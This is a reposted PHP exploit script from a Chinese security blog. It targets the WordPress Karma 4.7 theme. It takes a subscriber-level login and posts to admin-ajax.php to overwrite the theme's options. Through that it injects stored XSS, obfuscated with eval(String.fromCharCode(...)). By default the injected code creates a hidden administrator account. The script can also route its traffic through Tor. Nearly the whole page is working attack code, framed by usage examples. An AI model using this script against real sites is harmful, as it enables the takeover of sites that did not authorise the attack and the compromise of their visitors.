WordPress Karma 4.7 – Responsive Theme Exploit

<?php
/**
 * Exploit Title: Karma Theme Exploit
 * Version: 4.7
 * Tested on: Debian 8, PHP 5.6.17-3
 * Type: Authenticated Options overwrite, Stored XSS
 * Time line: Found [28-Apr-2016], Vendor notified [28-Apr-2016], Vendor fixed: [], [RD:1]
 */
 
 
require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();
 
 
$options = getopt("t:m:u:p:f:c:",array('tor:'));
print_r($options);
$options = validateInput($options);
 
if (!$options){
    showHelp();
}
 
if ($options['tor'] === true)
{
    echo " ### USING TOR ###\n";
    echo "Setting TOR Proxy...\n";
    $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
    $curl->addOption(CURLOPT_PROXYTYPE,7);
    echo "Checking IPv4 Address\n";
    $curl->get('https://dynamicdns.park-your-domain.com/getip');
    echo "Got IP : ".$curl->getResponse()."\n";
    echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
    $answer = fgets(fopen ("php://stdin","r"));
    if(trim($answer) != 'wololo'){
        die("Aborting!\n");
    }
    echo "OK...\n";
}
 
 
function logIn(){
    return true;
    global $curl, $options;
    file_put_contents('cookies.txt',"\n");
    $curl->setCookieFile('cookies.txt');
    $curl->get($options['t']);
    $data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>'', 'wp-submit'=>'Log In');
    $curl->post($options['t'].'/wp-login.php', $data);
    $status =  $curl->getTransferInfo('http_code');
    if ($status !== 302){
        echo "Login probably failed, aborting...\n";
        echo "Login response saved to login.html.\n";
        die();
    }
    file_put_contents('login.html',$curl->getResponse());
 
 
}
 
function exploit(){
    global $curl, $options;
    if (!isset($options['f'])){
        $file = 'inject_admin.js';
        $js_code = file_get_contents(dirname(__FILE__).'/'.$file);
    } else {
        $js_code = file_get_contents(realpath($options['f']));
    }
    echo "Injecting JS Code:\n\n";
    echo $js_code."\n\n\n";
 
    $inject = array();
    for ($i = 0; $i < strlen($js_code); $i++){
        $inject[] = ord($js_code[$i]);
    }
    $inject = 'eval(String.fromCharCode('.implode(',',$inject).'))';
 
    $data = array('action'=>'of_ajax_post_action', 'type'=>'options', 'data'=>'ka_customcode_body=<script>'.$inject.'</script>');
    echo "Payload ". http_build_query($data) . "\n";
    $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
    $resp = $curl->getResponse();
    echo $resp;
 
}
 
 
logIn();
exploit();
 
 
 
function validateInput($options){
 
    if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
        return false;
    }
    if ( !isset($options['u']) ){
        return false;
    }
    if ( !isset($options['p']) ){
        return false;
    }
    if (!preg_match('~/$~',$options['t'])){
        $options['t'] = $options['t'].'/';
    }
    if (!isset($options['m']) || !in_array($options['m'], array('wpc','r','i','t') ) ){
        return false;
    }
    if ($options['m'] == 'r' && !isset($options['f'])){
        return false;
    }
    $options['tor'] = isset($options['tor']);
 
    return $options;
}
 
 
function showHelp(){
    global $argv;
    $help = <<<EOD
 
    Karma Theme Exploit (Theme options overwrite)
 
Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -u [USERNAME] -p [PASSWORD] -m i -f [FILE]
 
       *** You need to have a valid login (customer or subscriber will do) in order to use this "exploit" **
 
       [TARGET_URL] http://localhost/wordpress/
       [MODE] i - Inject JavaScript into the body tag.
       [FILE] You can provide a file with the JS code that you want to include in the <body>
              By default it injects an Admin creator JS snippet called inject_admin.js
 
Examples:
       php $argv[0] -t http://localhost/wordpress --tor=yes -u customer1 -p password -m i
       php $argv[0] -t http://localhost/wordpress --tor=yes -u customer1 -p password -m i -f custom_xss.js
 
    Misc:
           CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
           @link http://github.com/svyatov/CurlWrapper
           @license http://www.opensource.org/licenses/mit-license.html MIT License
 
EOD;
    echo $help."\n\n";
    die();
}

本文固定链接: https://www.unhonker.com/bug/1935.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2016年06月07日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: WordPress Karma 4.7 – Responsive Theme Exploit | 90' s Blog|关注网络信息安全
关键字:

WordPress Karma 4.7 – Responsive Theme Exploit:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!